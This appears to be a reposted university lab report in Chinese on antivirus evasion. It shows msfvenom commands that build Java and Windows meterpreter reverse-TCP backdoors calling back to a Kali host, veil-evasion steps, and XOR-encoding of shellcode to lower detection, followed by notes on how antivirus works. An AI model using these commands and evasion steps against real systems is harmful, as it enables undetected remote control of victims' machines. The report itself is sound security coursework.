20155210 网络攻防技术 实验三 免杀原理与实践

最新推荐文章于 2022-09-26 09:06:10 发布
最新推荐文章于 2022-09-26 09:06:10 发布
阅读量193 收藏
点赞数
文章标签: c/c++ java
原文链接:http://www.cnblogs.com/panyinghao/p/8758291.html
版权

网络攻防技术 实验三 免杀原理与实践

使用msf生成后门程序的检测

  • 首先我们对上次实验生成的后门exe,利用VirSCAN进行检测

如图:
1071475-20180409095609656-821115616.png

  • 然后我们利用msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.35.132(kali ip) lport=5210 x> 5210_backjar.jar,生成jar文件,进行检测。

如图:
1071475-20180409101947500-2090427828.png

检测结果:
1071475-20180409103902588-315024246.png

如图可知jar文件,免杀能力较强

使用veil-evasion生成反弹链接的可执行文件

  • 首先我们先对veil-evasion进行安装,详情可参考老师博客

  • 安装好之后,我们利用veil,指令打开veil-evasion

  • 依次用use evasionlist payloads,进入到payloads模板界面

如图:
1071475-20180409104716043-1806755845.png

  • 随便选择一个模板,将其复制,输入q退回到上一界面,然后输入use xxxxx(你所复制的模板)

  • 然后输入set LHOST kali-ipset LPORT 5210对其进行配置,然后输入generate,生成。

如图:
1071475-20180409105020751-989159272.png

  • 生成后如图:
    1071475-20180409105423477-348068818.png

  • 记录下exe文件的位置,将其拖到windows下进行检测,结果如图:

1071475-20180409105525539-258718402.png

利用shellcode编程实现免杀

  • 首先我们输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.35.132 LPORT=443 -f c

如图:
1071475-20180409105838548-1465371461.png

  • 根据老师所给的,将其变成C语言文件,进行编译

如图:
1071475-20180409113411999-1801470226.png

  • 进行回连,回连成功

如图:
1071475-20180409113448942-1765764143.png

  • 进行检测,如图:
    1071475-20180409114250841-693059635.png

对shellcode进行更改

  • 我首先对其进行异或,我做的为异或\x10
    如图:
    1071475-20180409123343049-1384685473.png

  • 回连成功
    如图:
    1071475-20180409123429036-1320087362.png

  • 进行检测,如图:
    1071475-20180409123543407-1780410347.png

加壳

加壳会起到反作用,原本为后门程序,加壳后会让杀毒软件认成木马。

基础问题

  • 杀软是如何检测出恶意代码的?

  • 1.基于特征码的检测:杀毒软件的病毒库记录了一些恶意软件的特征码,这些特征码由一个不大于64字节的特征串组成,根据已检测出或网络上公布的病毒,对其提取特征码,记录成病毒库,检测到程序时将程序与特征码比对即可判断是否是恶意代码。

  • 2.基于行为的恶意软件检测:在程序运行的状态下(动态)对其行为进行监控,如果有敏感行为会被认为是恶意程序,是一种动态的监测与捕捉。

  • 免杀是做什么?

免杀是将二进制码隐藏,或者变形

  • 免杀的基本方法有哪些?

1.改变特征码

2.对exe可执行文件加壳:压缩壳 加密壳

3.基于payload重新编译生成可执行文件

实验总结

我再次进行尝试,检查helloworld的C语言代码,结果如图

1071475-20180409125556988-31587618.png

有两个会提示木马。

转载于:https://www.cnblogs.com/panyinghao/p/8758291.html

weixin_30412577
关注
20202422 2022-2023-2 《网络与系统攻防技术实验实验报告
cdssywgyxx的博客
03-22 359
按照正常流程,执行call那一句指令的时候,EIP(下一条)的值应该是下条指令的地址,即80484ba,但解释e8这条指令时,CPU就会转而跳转到 “EIP + d7ffffff”这个位置的指令。参考图2的函数执行时堆栈部分结构,可以得知栈结构给输入字符分配28字节空间,EBP分配4字节空间,从33开始就是ESP的空间,也是4字节,所以输入的第33到36字节空间为覆盖ESP的内存区间。经过调试发现,是有一个push指令,将堆栈上的代码覆盖了,所以ESP也变化了值,所以不能触发shell。
网络攻防技术实践笔记-信息收集技术手段
老院长的博客
06-26 3799
网络攻防技术实践笔记-信息收集技术手段
【无线***实战】小试无线安全
weixin_33843409的博客
05-11 168
测试平台环境: 笔记本:IBM T43 网卡:Intel PRO/Wireless 2200BG(本想用WIFI-CITY800MW功率卡皇,实际测试在T43中收不到数据包,时间都快午夜了,也没细查就直接用了T43内置的无线网卡哈~) ------------------------------------前言--------------------------------- BackTr...
网络攻防原理
12-09
网络攻防原理
开放实验网络攻防实验报告
04-20
网络攻防系列实验报告,包括克隆账号,利用肉鸡控制目标机,计算机病毒分析,木马攻击,ARP欺骗,漏洞攻击
西南科技大学网络攻防与对抗实验三,ARP欺骗实验
06-02
实验旨在帮助学生深入理解ARP欺骗的原理,掌握其实施步骤,并通过使用Cain工具进行实践操作,增强对网络安全攻防的理解。 **二、实验环境与工具** 实验环境包括两台虚拟机:一台运行Windows XP作为攻击者,另一...
网络攻防对抗实验教程:攻防策略与技术实践
"《网络攻防对抗》是西南科技大学计算机科学与技术学院的一本实验教材,旨在教授学生网络攻防的基本技能和理论。该书涵盖了网络攻击和防御两个主要方面,帮助学生理解网络攻击的步骤、技术原理和防御措施,以提升...
网络信息安全课程中的SQL注入实验报告 - 安全攻防实践与解决方案
最新发布
10-28
内容概要:本文介绍了2019-2020年度下学期网络信息安全课程的大作业实验报告。主要内容包括SQL注入攻击的目的、内容、环境搭建、五种SQL注入类型的攻击方式及其解决方案。报告详细阐述了如何通过搭建LAMP环境,在...
网络攻防实验指导书.docx
09-30
本次网络攻防实验通过实践操作的方式,使学习者深入理解了网络嗅探技术的应用及其背后的原理。掌握了Sniffer Pro和URLSnooper的使用方法后,可以在网络安全监测、故障排查等多个场景中发挥重要作用。此外,通过对...
网络攻防原理第01讲网络对抗概述
10-28
网络攻防原理课程中,我们将探讨网络安全事件、网络对抗相关概念、网络攻击概述等基本知识,并掌握常见网络攻击及防护技术的基本原理和方法。通过本课程的学习,学生将具备基本的网络安全知识和技能,为后续学习和...
网络攻防34个实验
10-05
sniffer和Wireshark工具软件的使用,运用ping抓IP结构,
网络攻防_实验三
weixin_33691700的博客
03-31 293
转载于:https://www.cnblogs.com/clljs/p/10633400.html
网络攻防实验三免杀原理实践
weixin_33720956的博客
03-22 333
网络攻防实验三免杀原理实践 世界上公认的第一个在个人电脑上广泛流行的病毒是1986年初诞生的大脑(C-Brain)病毒,编写该病毒的是一对巴基斯坦兄弟,两兄弟经营着一家电脑公司,以出售自己编制的电脑软件为生。当时,由于当地盗版软件猖獗,为了防止软件被任意非法拷贝,也为了追踪到底有多少人在非法使用他们的软件,于是在1986年年初,他们编写了 “大脑(Brain)”病毒,又被称为“巴基斯坦”病...
20169205 2016-2017-2 《网络攻防技术免杀技术
weixin_30849591的博客
05-31 174
20169205 2016-2017-2 《网络攻防技术免杀技术 一、基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 恶意代码常常具有明显的特征码也就是一段数据,杀软检测到具有该特征码的程序就当作检测到了恶意代码。 启发式恶意软件检测 基于行为的恶意软件检测 如果一个程序的行为是带有恶意的行为,那么这个程序也会被认为是恶意代码。 (2)免杀是做什么? 使用一些方法使...
网络攻防实验——MAC泛洪攻击、ARP DOS、ARP中间人
Sarahing的博客
09-26 9503
网络攻防实验——MAC泛洪攻击、ARP DOS、ARP MiddleMan 合肥工业大学 网络攻防实验 项目二实验报告 项目二 一、搭建实验环境 1.实验要求: 利用VMware的NAT模式或Host模式构筑一个类似下面的虚拟网络 2、实验原理: (1)在NAT模式下,虚拟系统需要借助NAT(网络地址转换)功能,通过宿主机器所在的网络来访问公网。也就是说,使用NAT模式虚拟系统可把物理主机作为路由器访问互联网。NAT模式下的虚拟系统的TCP/IP配置信息是由VMnet8(NAT)虚拟网络的DHCP服务器提
综合渗透
weixin_30270889的博客
10-23 309
中国人民公安大学 Chinese people’public security university 网络对抗技术 实验报告 实验五 综合渗透 学生姓名 甘浩 年级 2015 区队 六 指导教师 ...
20155201 网络攻防技术 实验九 Web安全基础
weixin_30877181的博客
05-26 727
20155201 网络攻防技术 实验九 Web安全基础 一、实践内容 本实践的目标理解常用网络攻击技术的基本原理。Webgoat实践下相关实验。 二、报告内容: 1. 基础问题回答 1)SQL注入攻击原理,如何防御 SQL注入即是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的...
网络攻防原理及应用 知识梳理
热门推荐
D-lyw
06-16 2万+
网络攻防原理及应用 网络安全 密码应用技术 网络攻击技术 网络防御技术 IPSec SSL VPN 802.11 PKI 密码体系 认证技术 数据加解密技术 访问控制 IPS 入侵检测 安全审计 防火墙 信息收集、网络隐身、端口和漏洞扫描、实施攻击、设置后门和痕迹清除 恶意代码、远程入侵(攻击)、拒绝服务、身份假冒、信息截取和篡改
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值